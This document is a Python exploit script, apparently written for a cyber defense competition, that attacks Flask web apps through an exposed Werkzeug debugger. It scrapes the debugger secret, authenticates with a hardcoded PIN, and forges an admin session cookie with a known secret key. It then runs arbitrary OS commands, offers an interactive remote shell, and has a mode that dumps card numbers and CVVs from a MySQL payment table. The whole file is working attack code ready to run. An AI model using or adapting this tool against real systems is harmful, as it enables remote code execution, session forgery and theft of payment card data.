import requests
import re
import sys
import json
import html
from flask.sessions import SecureCookieSessionInterface
from flask import Flask

SECRET_KEY = "cdc"
PIN = "123456789"

def forge_flask_cookie(payload):
    app = Flask(__name__)
    app.secret_key = SECRET_KEY
    serializer = SecureCookieSessionInterface().get_signing_serializer(app)
    return serializer.dumps(payload)

def setup_debugger_session(target_url):
    print(f"[*] Targeting {target_url}...")
    print("[*] Triggering exception to find debugger...")
    session = requests.Session()
    try:
        resp = session.get(f"{target_url}/vehicles/crash/flag", timeout=10)
    except Exception as e:
        print(f"[-] Connection failed: {e}")
        return None, None, None

    if "Werkzeug powered traceback interpreter" not in resp.text:
        print("[-] Debugger not found. Is Debug Mode enabled?")
        return None, None, None

    secret = re.search(r'SECRET = "([^"]+)"', resp.text).group(1)
    app_frame = re.search(r'<div class="frame" id="frame-([0-9]+)">.*?<cite class="filename">"/app/', resp.text, re.DOTALL)
    frame_id = app_frame.group(1) if app_frame else re.search(r'id="frame-([0-9]+)"', resp.text).group(1)
    
    print(f"[+] Debugger found. SECRET: {secret}, frame_id: {frame_id}")
    print(f"[*] Authenticating with PIN {PIN}...")
    session.get(target_url + "/", params={'__debugger__': 'yes', 'cmd': 'pinauth', 'pin': PIN, 's': secret})
    print("[*] Injecting admin session...")
    admin_cookie = forge_flask_cookie({"username": "administrator", "is_admin": True})
    session.cookies.set("session", admin_cookie)
    return session, secret, frame_id

def execute_command(session, target_url, secret, frame_id, command):
    safe_command = json.dumps(command)
    python_payload = f"__import__('os').popen({safe_command}).read()"
    exec_params = {'__debugger__': 'yes', 'cmd': python_payload, 'frm': frame_id, 's': secret}
    resp = session.get(target_url + "/", params=exec_params)
    if resp.status_code == 200:
        output = resp.text.strip()
        if ">>>" in output:
            # Try to grab the content inside the string span
            string_match = re.search(r'<span class="string">&#39;(.*?)&#39;</span>', output, re.DOTALL)
            if string_match:
                return html.unescape(string_match.group(1)).encode('utf-8').decode('unicode_escape')
            
            # Fallback: strip the HTML and take everything after the prompt
            no_html = re.sub('<[^<]+?>', '', output)
            if ">>>" in no_html:
                return no_html.split(">>>")[-1].strip()
        return output
    return f"Error: {resp.status_code}"

if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Werkzeug RCE Exploit Tool")
    parser.add_argument("team", help="Team number or 'local'")
    parser.add_argument("command", nargs="?", help="Command to run (ignored if --interactive is set)")
    parser.add_argument("-i", "--interactive", action="store_true", help="Open a pseudo-shell")
    parser.add_argument("--harvest", action="store_true", help="Harvest MySQL payment info")
    
    args = parser.parse_args()
    
    url = "http://localhost:5001" if args.team == "local" else f"http://mgmt.team{args.team}.isucdc.com:5000"
    
    session, secret, frame_id = setup_debugger_session(url)
    if not session:
        sys.exit(1)

    if args.harvest:
        print("\n[*] Harvesting payment_info from MySQL...")
        harvest_payload = """
def harvest():
    import pymysql
    try:
        conn = pymysql.connect(host='mysql', user='cdc', password='cdc', database='transit')
        cursor = conn.cursor()
        cursor.execute('SELECT username, card_number, cvv FROM payment_info')
        rows = cursor.fetchall()
        out = [f"User: {r[0]} | Card: {r[1]} | CVV: {r[2]}" for r in rows]
        conn.close()
        return "\\n".join(out)
    except Exception as e:
        return str(e)
harvest()
"""
        print(execute_command(session, url, secret, frame_id, harvest_payload))
    elif args.interactive:
        print("\n[+] Pseudo-Shell opened. Type 'exit' to quit.")
        while True:
            try:
                cmd = input("rce-shell# ")
                if cmd.lower() in ["exit", "quit"]: break
                if not cmd.strip(): continue
                print(execute_command(session, url, secret, frame_id, cmd))
            except KeyboardInterrupt:
                break
    elif args.command:
        print(execute_command(session, url, secret, frame_id, args.command))
    else:
        cmd = input("Enter command to execute: ")
        print(execute_command(session, url, secret, frame_id, cmd))
